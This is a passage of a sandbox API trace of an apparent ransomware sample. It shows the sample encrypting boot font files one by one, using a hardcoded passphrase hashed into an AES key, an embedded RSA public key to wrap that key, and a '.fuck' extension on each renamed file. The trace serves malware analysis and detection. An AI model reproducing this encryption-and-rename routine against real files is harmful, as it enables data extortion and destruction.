"c:\\boot\\fonts\\meiryon_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.420] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.420] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276bff8) returned 1 [0231.421] CryptCreateHash (in: hProv=0x276bff8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.421] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.421] CryptHashData (hHash=0x394d28, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.421] CryptDeriveKey (in: hProv=0x276bff8, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.421] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.421] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.422] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276b998) returned 1 [0231.422] CryptImportPublicKeyInfo (in: hCryptProv=0x276b998, dwCertEncodingType=0x1, pInfo=0x2760790*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27607c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27607c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3946a8) returned 1 [0231.422] CryptEncrypt (in: hKey=0x3946a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.422] CryptEncrypt (in: hKey=0x3946a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276bf70*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276bf70*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.422] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276bf70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.422] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2773ec0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2773ec0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.422] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2773ec0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2773ec0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.423] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2773ec0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.423] CloseHandle (hObject=0xffffffff) returned 1 [0231.423] CloseHandle (hObject=0xffffffff) returned 1 [0231.423] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), bFailIfExists=0) returned 0 [0231.423] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.423] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.gsg")) returned 0 [0231.423] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.fuck")) returned 0 [0231.423] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.423] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.423] CryptReleaseContext (hProv=0x276bff8, dwFlags=0x0) returned 1 [0231.424] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.424] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.424] GetLastError () returned 0x5 [0231.424] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf")) returned 0x20 [0231.424] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.424] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.425] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.425] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.425] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276bc40) returned 1 [0231.427] CryptCreateHash (in: hProv=0x276bc40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.427] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.427] CryptHashData (hHash=0x394a68, pbData=0x2ec760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.427] CryptDeriveKey (in: hProv=0x276bc40, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394be8) returned 1 [0231.427] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.427] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.427] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276be60) returned 1 [0231.427] CryptImportPublicKeyInfo (in: hCryptProv=0x276be60, dwCertEncodingType=0x1, pInfo=0x275fc30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275fc60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275fc68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394068) returned 1 [0231.427] CryptEncrypt (in: hKey=0x394068, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.427] CryptEncrypt (in: hKey=0x394068, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b668*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b668*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.427] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b668, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.427] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2773ec0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2773ec0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.427] CryptEncrypt (in: hKey=0x394be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2773ec0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2773ec0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.427] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2773ec0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.428] CloseHandle (hObject=0xffffffff) returned 1 [0231.428] CloseHandle (hObject=0xffffffff) returned 1 [0231.428] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), bFailIfExists=0) returned 0 [0231.428] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.428] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.gsg")) returned 0 [0231.428] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.fuck")) returned 0 [0231.428] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.428] CryptDestroyKey (hKey=0x394be8) returned 1 [0231.428] CryptReleaseContext (hProv=0x276bc40, dwFlags=0x0) returned 1 [0231.428] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.428] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.429] GetLastError () returned 0x5 [0231.429] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf")) returned 0x20 [0231.429] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.429] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.430] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.430] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.430] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.432] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.432] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.432] CryptHashData (hHash=0x394be8, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.432] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394be8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.432] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.432] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.432] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276bc40) returned 1 [0231.432] CryptImportPublicKeyInfo (in: hCryptProv=0x276bc40, dwCertEncodingType=0x1, pInfo=0x27606c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27606f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27606f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394328) returned 1 [0231.433] CryptEncrypt (in: hKey=0x394328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.433] CryptEncrypt (in: hKey=0x394328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276bcc8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276bcc8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.433] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276bcc8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.433] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2777ed0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2777ed0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.433] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2777ed0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2777ed0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.433] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2777ed0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.433] CloseHandle (hObject=0xffffffff) returned 1 [0231.433] CloseHandle (hObject=0xffffffff) returned 1 [0231.433] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), bFailIfExists=0) returned 0 [0231.433] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.434] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.gsg")) returned 0 [0231.434] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.fuck")) returned 0 [0231.434] CryptDestroyHash (hHash=0x394be8) returned 1 [0231.434] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.434] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.434] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.434] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.434] GetLastError () returned 0x5 [0231.434] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf")) returned 0x20 [0231.434] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.435] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.435] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.435] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.435] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.437] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.437] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.437] CryptHashData (hHash=0x394a68, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.437] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394be8) returned 1 [0231.437] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.437] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.437] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276b6f0) returned 1 [0231.437] CryptImportPublicKeyInfo (in: hCryptProv=0x276b6f0, dwCertEncodingType=0x1, pInfo=0x275fea0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275fed0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275fed8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x393ee8) returned 1 [0231.437] CryptEncrypt (in: hKey=0x393ee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.437] CryptEncrypt (in: hKey=0x393ee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b778*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b778*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.437] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b778, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.438] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2777ed0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2777ed0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.438] CryptEncrypt (in: hKey=0x394be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2777ed0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2777ed0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.438] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2777ed0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.438] CloseHandle (hObject=0xffffffff) returned 1 [0231.438] CloseHandle (hObject=0xffffffff) returned 1 [0231.438] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), bFailIfExists=0) returned 0 [0231.438] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.438] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.gsg")) returned 0 [0231.438] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.fuck")) returned 0 [0231.439] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.439] CryptDestroyKey (hKey=0x394be8) returned 1 [0231.439] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.439] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.439] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.439] GetLastError () returned 0x5 [0231.439] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf")) returned 0x20 [0231.439] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.439] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.439] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.439] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.440] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276ba20) returned 1 [0231.441] CryptCreateHash (in: hProv=0x276ba20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.441] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.441] CryptHashData (hHash=0x394d28, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.441] CryptDeriveKey (in: hProv=0x276ba20, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394be8) returned 1 [0231.441] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 